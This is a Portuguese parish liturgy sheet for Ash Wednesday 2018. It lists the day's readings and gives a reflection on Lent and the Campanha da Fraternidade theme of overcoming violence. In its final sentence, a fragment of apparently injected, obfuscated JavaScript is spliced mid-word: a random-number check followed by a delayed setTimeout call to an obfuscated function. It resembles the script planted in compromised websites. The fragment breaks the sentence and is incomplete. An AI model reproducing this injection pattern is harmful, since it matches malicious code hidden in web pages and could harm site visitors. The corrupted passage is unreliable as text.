QUARTA-FEIRA DE CINZAS

Abertura da Campanha da Fraternidade de 2018.

14/02/2018 – Igreja Matriz – 19h30

Liturgia: Primeira Leitura (Jl 2,12-18), Responsório (Sl 50), Segunda Leitura (2Cor 5,20–6,2), Evangelho (Mt 6,1-6.16-18)

Deixar-se transformar pelo amor!

Como toda a Igreja de Cristo iniciamos hoje o Tempo da Quaresma. O Senhor nos convida para adentrar o mistério de seu amor redentor. Pela prática da oração, da meditação, do jejum e da penitência, encontremos o sentido mais profundo de nossa existência. Por isso, “rasgar o coração e não as vestes”, pois é nele que o amor do Senhor quer morar. Façamos o êxodo para a qual nos convida o tempo da Quaresma e vivamos como intensidade o mistério de nossa salvação: o Cristo Jesus.

O convite para se conciliar com Deus e com os irmãos, que comunica a Boa Nova desta celebração Eucarística, exige de nós sinceridade nas palavras e nas atitudes. É um convite que coloca uma finalidade concreta no exercício da penitência quaresmal: tornar-se justo, não para ser visto e aplaudido pelas pessoas, mas porque viver na justiça é a proposta de vida feita por Jesus no seu Evangelho.

O significado das cinzas bentas que recebemos sobre as nossas cabeças nos fazem lembrar que vamos morrer, que somos pó e ao pó da terra voltaremos (cf. Gn 3, 19), para que nosso corpo seja refeito por Deus de maneira gloriosa, para não mais perecer. Então, estas cinzas nos remete a sentirmos e reconhecer a própria fragilidade e mortalidade, que precisa ser redimida pela misericórdia de Deus.

 

A Campanha da Fraternidade deste ano tem como tema: “Fraternidade e superação da violência”, e o lema: “Vós sois todos irmãos”. É a proposta para nós, cristãos construir a fraternidade, promovendo a cultura de Paz, da Caridade, do Acolhimento, da Misericórdia, da Esperança, da e do Amor, a Luz da Palavra de Deus.

 

Equipe de Liturgia

A Campanha da Fraternidade ajuda-nos a refletir, desenvolver o espírito quaresmal de conversão e renovação interior a partir da realização de ações comunitária, maneira de colocar em prática a caridade e ajuda ao próximo, visandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}ando a transformação das injustiças sociais em defesa da vida.